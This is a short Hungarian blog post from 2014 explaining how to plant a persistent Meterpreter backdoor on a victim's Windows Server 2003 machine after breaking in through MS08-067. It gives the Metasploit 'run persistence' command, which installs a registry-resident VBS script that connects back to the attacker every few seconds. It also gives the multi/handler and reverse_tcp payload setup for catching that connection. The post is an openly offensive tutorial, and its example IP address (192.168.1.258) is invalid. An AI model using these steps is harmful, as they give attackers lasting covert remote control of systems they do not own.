2014. február 21., péntek

Meterpreter backdoor

Sziasztok! Ma arról fogok írni, hogy hogy kell backdoor-t elhelyezni egy rendszerben. De először is egy pár szót arról, hogy mi is az a backdoor. Magyarul hátsó kaput/ajtót jelent, amin keresztül bármikor hozzá tudunk férni a rendszerhez, feltéve ha le nem törli valaki valahogy a backdoor-t.
Az első lépés az hogy metasploit-al bejussunk az áldozat gépébe és meterpreter shell-t szerezzünk. Én ehhez most a(z) MS08-067 hibát használtam mert az én áldozatom most egy Windows Server 2003 típusú rendszer amiben megtaláljuk ezt a hibát, de erről már írtam lényeg ha bent vagyunk akkor írjuk be a következőt:
run persistence -h. És ki fogja dobni a használati utasítást.
Ez a "persistence" lesz a mi kis cimboránk aki majd elhelyez egy VBS szkriptet ami minden 5. másodpercben megpróbál majd visszanyitni hozzánk. Természetesen a registry-be is beírja magát, szóval nem hal meg egy újraindítástól.
run persistence -U -i másodperc -p port -r ip címed
példa: run persistence -U -i 5 -p 8080 -r 192.168.1.258.
Ha ezt látjuk semmi gond nincs, minden jó. :)
Most már ott csücsül az áldozat gépen a backdoorunk. Bármikor csatlakozni akarunk a géphez(valójában ő csatlakozik hozzánk :D) csak nyitnunk kell egy handlert, így:
use multi/handler
set lhost ip címed
set lport port (azt add meg amit a persistence szkriptnek is megadtál mert máskép nem fog visszanyitni hozzád)
set payload windows/meterpreter/reverse_tcp
exploit
Ez után várunk picit és bent is vagyunk ha minden jól ment. :) 
Mint már fentebb említettem a backdoor be van írva a registrybe így automatikusan indítja magát míg le nem törlik a gépről.
Ennyi lenne remélem érthető volt kösz,hogy elolvastad. :)